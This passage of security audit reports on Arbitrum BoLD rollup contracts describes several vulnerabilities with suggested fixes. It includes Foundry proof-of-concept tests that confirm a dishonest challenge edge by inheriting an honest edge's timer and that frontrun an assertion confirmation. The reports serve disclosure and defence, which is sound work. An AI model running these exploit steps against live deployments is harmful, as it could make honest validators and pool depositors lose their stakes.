As per the comments, the claiming edge must be exactly one level below (ie. in the subchallenge directly after the inheriting edge) and its originId must match the mutualId of the inheriting edge. For clarification, we note that the inheriting edge must be a leaf edge in a challenge/subchallenge tree since the root edges of subchallenges (the layer zero edges) have originId derived from the mutualId of one of these leaf edges, and this originId is inherited by all its children which result from bisection.

Note that rival edges share the same mutualId by definition and since there isn't any extra validation, if a specific edge is a valid inheriting edge, all rivals will also be valid inheriting edges. This means rivals belonging to dishonest challenge edge trees will also be able to inherit from the timer of edges in the honest tree. Consequently, if an honest edge accumulates sufficient unrivalled time for confirmation, a malicious actor can frontrun the confirmation of the honest challenge tree to confirm the dishonest challenge, and in turn an incorrect assertion.

It is sufficient for only one dishonest child edge to inherit a sufficient timer via claim since the other will be unrivalled as challenges between two assertions can only follow one unique bisection path in each challenge tree. The only way to deny this would be to create another assertion that can be bisected to rival the other child to halt the timer accumulation, but this would require loss of the assertion and challenge stake (since only one rival assertion and challenge edge can be confirmed). The timer can then be propogated upwards by children until we reach the root challenge edge to allow confirmation.

Even if confirmation of the dishonest root challenge edge is prevented by admin action, confirmation of the layer zero edges of subchallenges would ensure honest validators lose the stake submitted for creating a rival edge (since only one rival edge can be confirmed) and the dishonest validator(s) regain their stake.

PoC

The PoC below demonstrates the inheritance of the timer from the honest tree by an edge in the dishonest tree and the confirmation of the dishonest challenge edge as a result. The challenge progresses to the last level of level 1 (the first subchallenge).

Run the PoC below with the command:

forge test --match-contract Playground --match-test testConfirmIncorrectEdge
pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import "./Utils.sol";
import "../MockAssertionChain.sol";
import "../../src/challengeV2/EdgeChallengeManager.sol";
import "@openzeppelin/contracts/proxy/transparent/TransparentUpgradeableProxy.sol";
import "@openzeppelin/contracts/proxy/transparent/ProxyAdmin.sol";
import "../ERC20Mock.sol";
import "./StateTools.sol";
import "forge-std/console.sol";

import "./EdgeChallengeManager.t.sol";

contract Playground is EdgeChallengeManagerTest {
    function testConfirmIncorrectEdge() public {
        EdgeInitData memory ei = deployAndInit();
        (
            bytes32[] memory blockStates1,
            bytes32[] memory blockStates2,
            BisectionChildren[6] memory blockEdges1,
            BisectionChildren[6] memory blockEdges2
        ) = createBlockEdgesAndBisectToFork(
            CreateBlockEdgesBisectArgs(
                ei.challengeManager,
                ei.a1,
                ei.a2,
                ei.a1State,
                ei.a2State,
                false,
                a1RandomStates,
                a1RandomStatesExp,
                a2RandomStates,
                a2RandomStatesExp
            )
        );

        // bisection of level 1, last bisection for winning edge is unrivalled
        BisectionData memory bsbd = createMachineEdgesAndBisectToFork(
            CreateMachineEdgesBisectArgs(
                ei.challengeManager,
                1,
                blockEdges1[0].lowerChildId,
                blockEdges2[0].lowerChildId,
                blockStates1[1],
                blockStates2[1],
                true,
                ArrayUtilsLib.slice(blockStates1, 0, 2),
                ArrayUtilsLib.slice(blockStates2, 0, 2)
            )
        );

        // allow unrivalled timer to tick up for winning leaf
        _safeVmRoll(block.number + challengePeriodBlock);

        // update timer of level 1 unrivalled winning leaf
        ei.challengeManager.updateTimerCacheByChildren(bsbd.edges1[0].lowerChildId);

        ChallengeEdge memory winningEdge = ei.challengeManager.getEdge(bsbd.edges1[0].lowerChildId);
        ChallengeEdge memory losingRival = ei.challengeManager.getEdge(blockEdges2[0].lowerChildId);

        console.log("Losing rival timer before update:", losingRival.totalTimeUnrivaledCache);

        // inherit timer from level 1 winning leaf to level 0 losing rival
        ei.challengeManager.updateTimerCacheByClaim(
            blockEdges2[0].lowerChildId, 
            bsbd.edges1[0].lowerChildId
        );
        
        losingRival = ei.challengeManager.getEdge(blockEdges2[0].lowerChildId);
        console.log("Losing rival timer after update:", losingRival.totalTimeUnrivaledCache);

        // update timer of level 0 unrivalled losing upper child
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[0].upperChildId);
        console.log("Losing upper timer unrivalled:", ei.challengeManager.timeUnrivaled(blockEdges2[0].upperChildId));

        // propogate timers upwards to the incorrect assertion from the losing children
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[1].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[1].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[2].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[2].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[3].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[3].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[4].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[4].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[5].lowerChildId);

        assertEq(
            ei.challengeManager.getEdge(blockEdges2[5].lowerChildId).totalTimeUnrivaledCache,
            challengePeriodBlock 
        );

        // confirm the edge for the incorrect assertion
        ei.challengeManager.confirmEdgeByTime(blockEdges2[5].lowerChildId, ei.a1Data);

        assertTrue(
            ei.challengeManager.getEdge(blockEdges2[5].lowerChildId).status == EdgeStatus.Confirmed
        );
    }
}

Tools Used

Manual Review

Recommended Mitigation Steps

Allow child edges (from bisection) to inherit the claimId of their parent and check that the claimId of the claiming edge matches the edgeId of the inheriting edge (this would require changes to isLayerZeroEdge).

Assessed type

Invalid Validation

Griefing Attack Possible Where Validator Will Lose Their Stake

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L40
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/EdgeStakingPool.sol#L44

Vulnerability details

Proof of Concept

Flow

  1. Create a Pool: Any validator can use the createPool function to create a new AssertionStakingPool.
File: AssertionStakingPoolCreator.sol

    function createPool(
        address _rollup,
        bytes32 _assertionHash
    ) external returns (IAssertionStakingPool) {
        AssertionStakingPool assertionPool = new AssertionStakingPool{salt: 0}(_rollup, _assertionHash);
        emit NewAssertionPoolCreated(_rollup, _assertionHash, address(assertionPool));
        return assertionPool;
    }
  1. Deposit Tokens: Validators deposit tokens into the staking pool using the depositIntoPool function.
File: AbsBoldStakingPool.sol

    function depositIntoPool(uint256 amount) external {
        if (amount == 0) {
            revert ZeroAmount();
        }

        depositBalance[msg.sender] += amount;
        IERC20(stakeToken).safeTransferFrom(msg.sender, address(this), amount);

        emit StakeDeposited(msg.sender, amount);
    }
  1. Create Assertions: Using the deposited tokens, validators can create new assertions with the createAssertion function.
File: AssertionStakingPool.sol

    function createAssertion(AssertionInputs calldata assertionInputs) external {
        uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
        // approve spending from rollup for newStakeOnNewAssertion call
        IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
        // reverts if pool doesn't have enough stake and if assertion has already been asserted
        IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
    }

Important things to note about this function

  • No access control in createAssertion.

  • The required stake tokens are directly approved and transferred without verifying the caller's authorization.

Griefing Attack Scenario

  1. Alice creates a new AssertionStakingPool and deposits X tokens.

  2. Attacker frontruns Alice by calling createAssertion with incorrect assertionInputs.

  3. Alice unknowingly becomes a malicious validator due to the incorrect assertion and loses her stake.

Similar situation will happen with EdgeStakingPool contract as well while creating new edge through createEdge function.

  1. Alice creates a new EdgeStakingPool and deposits X tokens.

  2. Attacker frontruns Alice by calling createEdge with incorrect CreateEdgeArgs.

  3. Alice unknowingly becomes a malicious due to the incorrect edge and loses her stake.

Impact

Validators can lose their stake due to incorrect assertions being made on their behalf.

Tools Used

VS Code

Recommended Mitigation Steps

Implement access control to ensure that only the validator who deposited the tokens can create assertions or edges.

File: AssertionStakingPool.sol

    function createAssertion(AssertionInputs calldata assertionInputs) external {
        uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
+       require(depositBalance[msg.sender] >= requiredStake);
        // approve spending from rollup for newStakeOnNewAssertion call
        IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
        // reverts if pool doesn't have enough stake and if assertion has already been asserted
        IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
    }
File: EdgeStakingPool.sol

    function createEdge(CreateEdgeArgs calldata args) external {
        uint256 requiredStake = EdgeChallengeManager(challengeManager).stakeAmounts(args.level);
+       require(depositBalance[msg.sender] >= requiredStake);
        IERC20(stakeToken).safeIncreaseAllowance(address(challengeManager), requiredStake);
        bytes32 newEdgeId = EdgeChallengeManager(challengeManager).createLayerZeroEdge(args);
        if (newEdgeId != edgeId) {
            revert IncorrectEdgeId(newEdgeId, edgeId);
        }
    }

Assessed type

Invalid Validation

`sequencerBatchAcc` has an incorrect value in `RollupCore`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L471

Vulnerability details

Impact

In the current implementation of the RollupCore contract, createNewAssertion() function is used to create new assertions. The new assertion should have several parameters including the hash of the previous assertion, the state after, and the sequencer inbox accumulator value. The problem is that currently when determining sequencerInboxAcc value, the function uses afterInboxPosition that shows how much messages should the next assertion process instead of currentInboxPosition that shows how much messages this assertion has process (what the value of sequencer accumulator should represent).

Proof of Concept

Let's say there are 200 messages that were added to the inbox so that currentInboxPosition is equal to 200 (at the time assertion was created):

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L436

  uint256 currentInboxPosition = bridge.sequencerMessageCount();

Then the function fetches the new messages that may have added to the inbox since the last assertion:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L450

uint256 afterInboxPosition = afterGS.getInboxPosition();

The problem is that the sequencer should represent how many messages this assertion has processed and not the value that the next assertion should represent:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L471

sequencerBatchAcc = bridge.sequencerInboxAccs(afterInboxPosition - 1);

Tools Used

Manual review.

Recommended Mitigation Steps

Change afterInboxPosition on currentInboxPosition when assigning the value of sequence accumulator.

Assessed type

Other

Upgrades to EdgeChallengeManager changing staking requirement can cause `funds loss`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L429
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L580

Vulnerability details

The fact that EdgeChallengeManager.sol is upgradeble, if an Admin would be to upgrade the contract and update stakeToken and/or stakeAmounts, that would result in critical consequences.

This report is related to TOB-ARBCH-31 from the TrailOfBits audit which was identified as Informational. Reader should read that finding prior to continue reading this report to get proper context. This report will provide additional information how this would have a critical impacts which increase the severity of the original finding and how the current contrat doesn't prevent an Admin todo such upgrade, coupled with the fact that not all the team member seems to be fully aware of this (see discussion from Discord, refer to last section), which seems to warrant Medium severity overall.

Impacts (stakeAmounts)

An upgrade implying a change in the staking requirement would be problematic (using WETH as stakeToken):

  1. No stake required --> 100 WETH stake required: A user which have created a level edge zero before the upgrade might be able to be refunded 100 WETH after the upgrade even if he didn't stake any at the edge creation (see POC).
  2. 50 WETH stake required --> 100 WETH stake required: This is very similar to impact 1. A user which have created a level edge zero before the upgrade might be able to be refunded 100 WETH (instead of his 50 WETH staked), so the difference betweem the new stake requirement - the old stake requirement. This impact is the most realistic to be happening more often in production.
  3. 100 WETH stake required --> 50 WETH stake required: A user which have created a level edge zero before the upgrade will not be able to get refunded his 100 WETH even if he did stake such amount at the edge creation since now the contract will refund only the new value, which is 50 WETH, so half of his original value.
  4. 100 WETH stake required --> no stake required: A user which have created a level edge zero before the upgrade will not be able to get refunded his 100 WETH even if he did stake such amount at the edge creation since now the contract will skip the transfer, so he will get nothing.
    function refundStake(bytes32 edgeId) public {
        ChallengeEdge storage edge = store.get(edgeId);
        // setting refunded also do checks that the edge cannot be refunded twice
        edge.setRefunded();

        IERC20 st = stakeToken;
        uint256 sa = stakeAmounts[edge.level];
        // no need to refund with the token or amount where zero'd out
        if (address(st) != address(0) && sa != 0) {                                // <------------------------- THIS condition will SKIP the transfer, as identified also in the TrailOfBits audit
            st.safeTransfer(edge.staker, sa);
        }

        emit EdgeRefunded(edgeId, store.edges[edgeId].mutualId(), address(st), sa);
    }

Impacts (stakeToken)

  1. address(0) --> WETH: Same as Impact #1.
  2. WETH --> address(0): Same as Impact #4.
  3. WETH --> WBTC: This will be ok for direct users, but for pool's user that will be catastrophic as switching to a new token would break the staking pool logic (both, assertion and edge) and users partipating in such pool would lost their entire stake. The reason is since the stakeToken is stored at pool creation (eg: WETH), when EdgeChallengeManager get upgraded to a new stakeToken (eg: WBTC), those tokens will still be transfered to the pool's contract when refunding/withdrawing occurs, but they will be stuck there forever, as the safeTransfer from withdrawFromPool will fail, as it will try to transfer the initial token (WETH) while the contract will now own new one (WBTC).
    function withdrawFromPool(uint256 amount) public {
        if (amount == 0) {
            revert ZeroAmount();
        }
        uint256 balance = depositBalance[msg.sender];
        if (amount > balance) {
            revert AmountExceedsBalance(msg.sender, amount, balance);
        }

        depositBalance[msg.sender] = balance - amount;
        IERC20(stakeToken).safeTransfer(msg.sender, amount); // <--- THIS will fail as the contract will not own any WETH, but WBTC
        
        emit StakeWithdrawn(msg.sender, amount);
    }

Be aware that all the mentionned impacts are also affecting EdgeStakingPool contract users, which ultimatelly could represent Alice or Bob in the following PoC. There is a twist thought, in case of Impact #2, the additional token transfered to EdgeStakingPool would be stuck in it forever. The reason being that depositIntoPool and withdrawFromPool will be limited to the amount having being accounted only, so the developer assumption here would be broken.

///         Tokens sent directly to this contract will be lost.
///         It is assumed that the challenge manager will not return more tokens than the amount deposited by the pool.
///         Any tokens exceeding the deposited amount to the pool will be stuck in the pool forever.

Proof of Concept

This is showcasing Impact 1. We have 3 actors in play: Admin, Alice and Bob.

  1. Admin deploy ECM contract without staking required to create level zero edge.
  2. Alice decide to create a challenge calling ECM::createLayerZeroEdge, no token are transfered as it's stake free.
  3. Afterward (but before Alice challenge is completed), Admin decides to upgrade the contract changing the staking requirement, now requiring 100 WETH to create a level zero edge.
  4. Bob decide to create a level zero edge for different claim/assertion (so not an Alice's rival edge).
  5. Once Alice's challenge period is completed, she is able to confirm his claim, and afterward call ECM::refundStake. Even if she haven't staked any token, the ECM will send her back the 100 WETH, and since the contract only own 100 WETH (staked by Bob in the previous step), so effectivelly stealing the Bob's stake. (user funds loss)
  6. Once Bob has his claim confirmed later on (assuming he wins his claim/assertion too), calling ECM::refundStake will be an odd surprise as the call will revert, as the contract will lack funds. (protocol insolvency)

Recommended Mitigation Steps

If an upgrade is required for the stakeToken and/or stakeAmounts, normal upgrade can't be used, and only a complete upgrade which would also upgrade the proxy (so not re-use the storage) and officialize it with RollupAdminLogic::setChallengeManager afterward. That should be documented very clearly and explicitly as the current setup as the potential to break things down the road, but the proper fix would be to make those state variables immutable, which would prevent this completely.

Otherwise, you could track the staked amount/token inside the ChallengeEdge struct instead of having a single global instance and integrate it properly into ECM, that should allow to do normal upgrade. Here would be a draft implementation.

struct ChallengeEdge {
    ... // omitting to save space
	
    uint8 level;
    /// @notice Set to true when the staker has been refunded. Can only be set to true if the status is Confirmed
    ///         and the staker is non zero.
    bool refunded;
+   /// @notice The amount staked for this edge.
+   ///         Only populated on zero layer edges
+   uint256 stakedAmount;
+   /// @notice The token staked.
+   ///         Only populated on zero layer edges
+   address stakeToken;    
    /// @notice TODO
    uint64 totalTimeUnrivaledCache;
}
    function refundStake(bytes32 edgeId) public {
        ChallengeEdge storage edge = store.get(edgeId);
        // setting refunded also do checks that the edge cannot be refunded twice
        edge.setRefunded();

-       IERC20 st = stakeToken;
-       uint256 sa = stakeAmounts[edge.level];
+       IERC20 st = edge.stakeToken;
+       uint256 sa = edge.stakedAmount;
        // no need to refund with the token or amount where zero'd out
        if (address(st) != address(0) && sa != 0) {
            st.safeTransfer(edge.staker, sa);
        }

        emit EdgeRefunded(edgeId, store.edges[edgeId].mutualId(), address(st), sa);
    }

Discord private discussion

Here is a snapshot from my discussion with godzillaba, which as I interpret it, by using "i believe the standard procedure" means to me that it's not 100% clear that a normal upgrade can't be done for staking requirements.

dontonka — 05/18/2024 8:10 PM
Reminder: this is a private channel.

Since EdgeChallengeManager is an upgradable contract and based on the following comment. The following secnarios are possible?
        // The contract initializer can disable staking by setting zeros for token or amount, to change
        // this a new challenge manager needs to be deployed and its address updated in the assertion chain
        if (address(st) != address(0) && sa != 0) {


Initial deployment (t0): stakeToken == address(0), stakeAmounts with valid values. So this means mini-bond free to create edges.
Upgrade One (t0 + 5 days) : stakeToken is now valid and stakeAmounts remains the same. So this means there is a mini-bond cost to create an edge.
Upgrade Two (t0 + 30 days): stakeToken remains the same, but stakeAmounts are increased as they were too low (all the levels).
Upgrade Three (t0 + 90 days): stakeToken is changed to another token (WETH --> WBTC), and stakeAmounts are adjusted downward as asset is worth more.
 
godzillaba — 05/19/2024 2:43 PM
this sounds possible, yes. although i believe the standard procedure for upgrades and parameter updates of the challenge manager will be to actually deploy an entirely new version and call RollupAdminLogic::setChallengeManager

Assessed type

Upgradable

Staker's funds might be stuck in the rollup contract if `forceCreateAssertion` is used

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupAdminLogic.sol#L237-L256

Vulnerability details

Impact

If there is a wrong assertion created in the rollup contract, calling forceCreateAssertion will not transfer "bad" assertion stake to the loserStakeEscrow; instead, it will remain in the rollup contract forever.

Proof of Concept

The rollup contract assumes that there can only be one correct assertion. Therefore, it transfers all subsequent stakes into the loserStakeEscrow since bad assertion stakers cannot withdraw.

    function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
        public
        onlyValidator
        whenNotPaused
    {
        ---SNIP---

        if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
>>          IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }
    }

However, in one case, this doesn't happen. Consider the following scenario:

  1. Alice creates and stakes tokens for the wrong assertion, and they remain in the rollup contract.
  2. The admin calls forceCreateAssertion to create a correct assertion and confirms it.
    function forceCreateAssertion(
        bytes32 prevAssertionHash,
        AssertionInputs calldata assertion,
        bytes32 expectedAssertionHash
    ) external override whenPaused {
        // To update the wasm module root in the case of a bug:
        // 0. pause the contract
        // 1. update the wasm module root in the contract
        // 2. update the config hash of the assertion after which you wish to use the new wasm module root (functionality not written yet)
        // 3. force refund the stake of the current leaf assertion(s)
        // 4. create a new assertion using the assertion with the updated config has as a prev
        // 5. force confirm it - this is necessary to set latestConfirmed on the correct line
        // 6. unpause the contract

        // Normally, a new assertion is created using its prev's confirmPeriodBlocks
        // in the case of a force create, we use the rollup's current confirmPeriodBlocks
>>      createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);

        emit OwnerFunctionCalled(23);
    }

    function forceConfirmAssertion(
        bytes32 assertionHash,
        bytes32 parentAssertionHash,
        AssertionState calldata confirmState,
        bytes32 inboxAcc
    ) external override whenPaused {
        // this skip deadline, prev, challenge validations
        confirmAssertionInternal(assertionHash, parentAssertionHash, confirmState, inboxAcc);
        emit OwnerFunctionCalled(24);
    }

Note that the funds are not transferred to the escrow, even though it is a second child. The forceCreateAssertion comments mention a force refund of the stakers, but Alice can't be refunded due to the requireInactiveStaker condition. As a result, Alice's stake will be stuck in the rollup contract.

There is a function called fastConfirmNewAssertion that is similar to the forceCreateAssertion which includes the transfer of stake in case the new assertion is a second child.

    function fastConfirmNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
        external
        whenNotPaused
    {
        ---SNIP--- 
        if (status == AssertionStatus.NoAssertion) {
            // If not exists, we create the new assertion
            (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertion, expectedAssertionHash);
            if (!getAssertionStorage(newAssertionHash).isFirstChild) {
                // only 1 of the children can be confirmed and get their stake refunded
                // so we send the other children's stake to the loserStakeEscrow
                // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
>>              IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
            }
        }

Tools Used

Manual review

Recommended Mitigation Steps

Consider transferring tokens to the loser escrow in the forceCreateAssertion, like it's done in the fastConfirmNewAssertion function.

    function forceCreateAssertion(
        bytes32 prevAssertionHash,
        AssertionInputs calldata assertion,
        bytes32 expectedAssertionHash
    ) external override whenPaused {
+       (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);
+        if (!getAssertionStorage(newAssertionHash).isFirstChild) {
+          IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
+            }
        emit OwnerFunctionCalled(23);
    }

Assessed type

Other

Validator AFK timer is ticking even when the rollup contract is paused

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L51-L60
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L71-L75

Vulnerability details

Impact

The current issue with the rollup contract allows for unintended disabling of the whitelist. This occurs because the time when the rollup contract was paused is included in the validator AFK calculations.

Proof of Concept

The RollupUserLogic.sol contract contains a function that allows the whitelist to be disabled, thereby allowing any user to create and confirm assertions.

    function removeWhitelistAfterValidatorAfk() external {
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
>>      require(_validatorIsAfk(), "VALIDATOR_NOT_AFK");
        validatorWhitelistDisabled = true;
    }

One of the conditions for the whitelist to be disabled is that the validator must be AFK for 201600 blocks, which means that no new assertions were created during this time.

    function _validatorIsAfk() internal view returns (bool) {
        AssertionNode memory latestConfirmedAssertion = getAssertionStorage(latestConfirmed());
        if (latestConfirmedAssertion.createdAtBlock == 0) return false;
        // We consider the validator is gone if the last known assertion is older than VALIDATOR_AFK_BLOCKS
        // Which is either the latest confirmed assertion or the first child of the latest confirmed assertion
        if (latestConfirmedAssertion.firstChildBlock > 0) {
>>          return latestConfirmedAssertion.firstChildBlock + VALIDATOR_AFK_BLOCKS < block.number;
        }
>>      return latestConfirmedAssertion.createdAtBlock + VALIDATOR_AFK_BLOCKS < block.number;
    }

However, if the rollup contract is paused, the validator would not be able to create new assertions. This can cause the timer to run out, allowing users to call the removeWhitelistAfterValidatorAfk function and disable the whitelist.

Tools Used

Manual review

Recommended Mitigation Steps

Consider taking into account the time that the contract was in a paused state during the validator AFK calculation.

Assessed type

Timing

confirmAssertin() can be DOSed.

Lines of code

https://github.com/OffchainLabs/bold/blob/0420b9ddb88f71f5e86ca1b3bc256c09346b8315/contracts/src/rollup/RollupUserLogic.sol#L115

Vulnerability details

Impact

Confirmation of honest assertion can be DOSed after delay period when a malicious validator front-runs confirmAsseertion() to post a malicious assertion.

By design, a honest validator should be able confirm assertion and withdraw bonds if there is no rival sibling after delay(1 week) period.

However, the check for rival sibling is incomplete and allows posting rival after delay period has passed.

The implication of this is that honest validator will have to get funds to create a challenge edge(which can be confirmed with time).

Due to the large amount of bond required to create assertion, honest validator might have created an assertion pool to raise funds to create assertion, with this development, honest participant is required to get funds to create an edge so that assertion will be confirmed.

Proof of Concept

The check for rivalry sibling does not include time.

  1. Alice creates a valid assertion
  2. After delay period is passed, no counter assertion.
  3. Alice tries to confirm assertion, but Bob frontons it with a rival assertion, Alice transaction revert, since no edge was provided.
@> if (prevAssertion.secondChildBlock > 0 ) { //@audit-issue  
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Paste testSuccessConfirmUnchallengedAssertions() in Rollup.t.sol

    function testSuccessConfirmUnchallengedAssertions() public returns (bytes32, AssertionState memory, uint64) {
        (bytes32 assertionHash, AssertionState memory state, uint64 inboxcount) = testSuccessCreateAssertion();
        vm.roll(userRollup.getAssertion(genesisHash).firstChildBlock + CONFIRM_PERIOD_BLOCKS + 1);
        bytes32 inboxAccs = userRollup.bridge().sequencerInboxAccs(0);

        //Frontrun Confirmation with invalid assertion that has same parent with assertion to be confirmed
        //uint64 inboxcount = uint64(_createNewBatch());
        AssertionState memory beforeState;
        beforeState.machineStatus = MachineStatus.FINISHED;
        AssertionState memory afterState;
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.bytes32Vals[0] = keccak256("FIRST_ASSERTION_BLOCKHASH_A_WRONG_VALUE"); // blockhash
        afterState.globalState.bytes32Vals[1] = keccak256("FIRST_ASSERTION_SENDROOT_A_WRONG_VALUE"); // sendroot
        afterState.globalState.u64Vals[0] = 1; // inbox count
        afterState.globalState.u64Vals[1] = 0; // pos in msg

        bytes32 expectedAssertionHash = RollupLib.assertionHash({
            parentAssertionHash: genesisHash,
            afterState: afterState,
            inboxAcc: userRollup.bridge().sequencerInboxAccs(0)
        });

        vm.prank(validator2);
        userRollup.newStakeOnNewAssertion({
            tokenAmount: BASE_STAKE,
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: bytes32(0),
                    prevPrevAssertionHash: bytes32(0),
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: expectedAssertionHash,
            withdrawalAddress: validator2Withdrawal
        });

        vm.prank(validator1);
        userRollup.confirmAssertion(
            assertionHash,
            genesisHash,
            firstState,
            bytes32(0),
            ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: firstState.globalState.u64Vals[0]
            }),
            inboxAccs
        );
        return (assertionHash, state, inboxcount);
    }

Test revert with error

Failing tests:
Encountered 1 failing test in test/Rollup.t.sol:RollupTest
[FAIL. Reason: EdgeNotExists(0x0000000000000000000000000000000000000000000000000000000000000000)] testSuccessConfirmUnchallengedAssertions() (gas: 662856)

Tools Used

Manual review and foundry.

Recommended Mitigation Steps

---   if (prevAssertion.secondChildBlock > 0 ) { 
+++   if (prevAssertion.secondChildBlock > 0 && prevAssertion.firstChildBlock + prevConfig.confirmPeriodBlocks > prevAssertion.secondChildBlock) { 
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Assessed type

DoS

If an edge or assertion gets slashed, some depositors to the stakingPool will be cheated.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AbsBoldStakingPool.sol#L41-L54

Vulnerability details

Impact

Stakers to a pool are not treated equally when their edge gets slashed. Some will be able to receive the full amount they deposited, while others receive nothing

Proof of Concept

EdgeStakingPool and AssertionStakingPool inherit AbsBoldStakingPool. They allow users to pool resources together to make assertions and edges.
Looking at AbsBoldStakingPool#withdrawFromPool, we can see that depositors are allowed to withdraw the full amount they deposited, even though the edge they staked on got slashed:

    function withdrawFromPool(uint256 amount) public {
        if (amount == 0) {
            revert ZeroAmount();
        }
        uint256 balance = depositBalance[msg.sender];
        if (amount > balance) {
            revert AmountExceedsBalance(msg.sender, amount, balance);
        }

        depositBalance[msg.sender] = balance - amount;
        IERC20(stakeToken).safeTransfer(msg.sender, amount);//@audit-info some depositors will be cheated if edge or assertion(?) gets slashed

        emit StakeWithdrawn(msg.sender, amount);
    }

So let's say 10 people contribute $10 each to an EdgeStakingPool, and the stake required to make an edge is $50.
If the edge they mad gets invalidated, 5 users will be able to withdraw their full $10, while the other 5 get nothing.

Tools Used

Manual Review

Recommended Mitigation Steps

Losses from losing an assertion or edge should be socialized among all depositors to a pool.
StakingPool should employ shares mechanism, where each depositor will be able to withdraw their share of the total value of the pool.

Assessed type

Error

An invalid validator can prevent upgrade by creating an assertion on old Nitro rollup

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L357

Vulnerability details

Impact

The BoLD upgrade action will fail

Proof of Concept

The BoLD upgrade is processed via BOLDUpgradeAction.sol which will be called through delegatecall from the governance.
